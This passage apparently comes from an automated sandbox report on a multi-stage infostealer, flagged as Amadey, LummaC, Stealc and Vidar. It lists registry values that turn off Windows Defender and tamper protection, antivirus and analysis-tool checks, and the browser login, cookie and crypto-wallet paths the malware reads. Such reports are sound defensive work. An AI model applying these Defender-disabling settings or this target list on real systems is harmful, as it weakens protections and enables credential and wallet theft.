Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016041001\4b8eda303b.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1016045001\cd39094ad6.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\IUIANUOB2PLSS94RMQY0EED.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00D8CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_00D8CBEA

Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1016047001\7ea0decd34.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Source: 4b8eda303b.exe, 0000000C.00000003.2728432336.0000000007E31000.00000004.00001000.00020000.00000000.sdmp, 2656cd82fe.exe, 0000000D.00000002.2880704353.0000000000F1D000.00000040.00000001.01000000.0000000B.sdmp, 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: procmon.exe
Source: 4b8eda303b.exe, 0000000C.00000003.2728432336.0000000007E31000.00000004.00001000.00020000.00000000.sdmp, 2656cd82fe.exe, 0000000D.00000002.2880704353.0000000000F1D000.00000040.00000001.01000000.0000000B.sdmp, 2656cd82fe.exe, 0000000D.00000003.2838596176.000000000751C000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: wireshark.exe
Source: ccdb824191.exe, 0000000F.00000003.3244924677.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3247506406.0000000001304000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3324447464.00000000012B3000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3246327776.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 0000000F.00000003.3244924677.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3467839896.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3413961863.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3430139663.00000000012D3000.00000004.00000020.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3410941363.0000000005ACA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.2.file.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.skotes.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.skotes.exe.fb0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2064441142.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2085433951.0000000004870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2485792183.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2134494920.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2129775105.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2105586602.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2093661123.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: 5cbc6b58d3.exe PID: 7604, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: ccdb824191.exe PID: 6256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ccdb824191.exe PID: 2876, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000022.00000003.3299677003.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3390011704.000000000080B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3230900745.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.3138251493.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.3393637637.0000000000E91000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3232792590.0000000000E91000.00000040.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cd39094ad6.exe PID: 5848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cd39094ad6.exe PID: 8084, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 95bf820dd4.exe PID: 1084, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: ccdb824191.exe, 0000000F.00000003.3221209371.0000000001304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: ccdb824191.exe, 0000000F.00000003.3221209371.0000000001304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: ccdb824191.exe, 0000000F.00000003.3220361028.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: ccdb824191.exe, 0000000F.00000003.3327171891.000000000132E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: r-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version"," ~>
Source: ccdb824191.exe, 0000000F.00000003.3220157142.0000000001339000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: ccdb824191.exe, 0000000F.00000003.3220361028.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: ccdb824191.exe, 0000000F.00000003.3221209371.0000000001304000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: ccdb824191.exe, 0000000F.00000003.3221132708.000000000132E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: ccdb824191.exe, 0000000F.00000003.3220361028.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.5:49843 -> 141.8.192.141:80

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\temporary\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionstore-backups\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\2023-10\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\to-be-removed\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\events\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
